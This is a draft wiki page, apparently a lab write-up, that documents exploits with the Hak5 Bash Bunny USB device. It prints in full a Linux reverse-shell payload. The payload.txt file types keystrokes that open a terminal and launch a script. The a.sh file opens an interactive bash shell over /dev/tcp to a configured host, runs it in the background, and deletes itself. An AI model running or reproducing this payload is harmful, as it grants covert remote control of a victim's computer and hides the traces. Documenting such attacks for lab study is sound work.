Difference between revisions of "Bash Bunny Exploits"
VHorvathova (talk | contribs) |
VHorvathova (talk | contribs) |
||
Line 16: | Line 16: | ||
bashbunny-payloads/payloads/library/remote_access/LinuxReverseShell | bashbunny-payloads/payloads/library/remote_access/LinuxReverseShell | ||
The payload is to be copied from the library and pasted to either switch1 or switch2 on the Bash Bunny, while it is plugged in in Arming mode. | |||
The payload itself is a textfile <i>payload.txt</i> and comes with a script <i>a.sh</i> as well. It is well documented, which in the case of the Bash Bunny is quite a rarity and helps with the understanding of the program. The contents are the following:<br> | The payload itself is a textfile <i>payload.txt</i> and comes with a script <i>a.sh</i> as well. It is well documented, which in the case of the Bash Bunny is quite a rarity and helps with the understanding of the program. The contents are the following:<br> |
Revision as of 12:42, 4 October 2021
Summary
This is a DRAFT. The Hak5 Bash Bunny will be used for various exploits which will be explained, documented and evaluated in the following chapters.
Requirements
- Operating system: Ubuntu 18.04 bionic amd64, Windows 10
- Hardware: Hak5 Bash Bunny
In order to get a general idea about the Bash Bunny, please refer to Hak5 Bash Bunny or the official Hak5 Documentation and Git repository.
Exploits
Reverse shell on Linux
For this exploit, the Linux Reverse Shell payload is used, which is in the remote access category on Bash Bunny's Git Repository.
bashbunny-payloads/payloads/library/remote_access/LinuxReverseShell
The payload is to be copied from the library and pasted to either switch1 or switch2 on the Bash Bunny, while it is plugged in in Arming mode.
The payload itself is a textfile payload.txt and comes with a script a.sh as well. It is well documented, which in the case of the Bash Bunny is quite a rarity and helps with the understanding of the program. The contents are the following:
payload.txt
#!/bin/bash # # Title: Linux Reverse Shell # Author: tuzzmaniandevil # Version: 1.2 # # Runs a script in the background that creates a reverse shell connection to the configured address and then removes itself. # # Magenta..................Setup # Yellow single blink......Executing # Green....................Finished # Config options RHOST=127.0.0.1 RPORT=4444 # Start Setup LED SETUP # Gets Switch Position GET SWITCH_POSITION # Set Attack Mode ATTACKMODE HID STORAGE # Get the switch position GET SWITCH_POSITION # Open a terminal Q CTRL-ALT t # Wait for terminal to open sleep 1 LED STAGE1 # Copy bash script Q STRING "cp \$(readlink -f /dev/disk/by-label/BashBunny | while read dev;do mount | grep \"\$dev\b\" | awk '{print \$3}';done)/payloads/" Q STRING $SWITCH_POSITION Q STRING "/a.sh ~/a.sh && chmod +x ~/a.sh && ~/a.sh $RHOST $RPORT" Q ENTER # Quit the terminal LED CLEANUP Q STRING exit Q ENTER LED FINISH
a.sh
#!/bin/bash A="$0" H=$1 P=$2 /bin/bash -c /bin/bash -i > /dev/tcp/$H/$P 0<&1 2>&1 & disown $! rm -f "$A"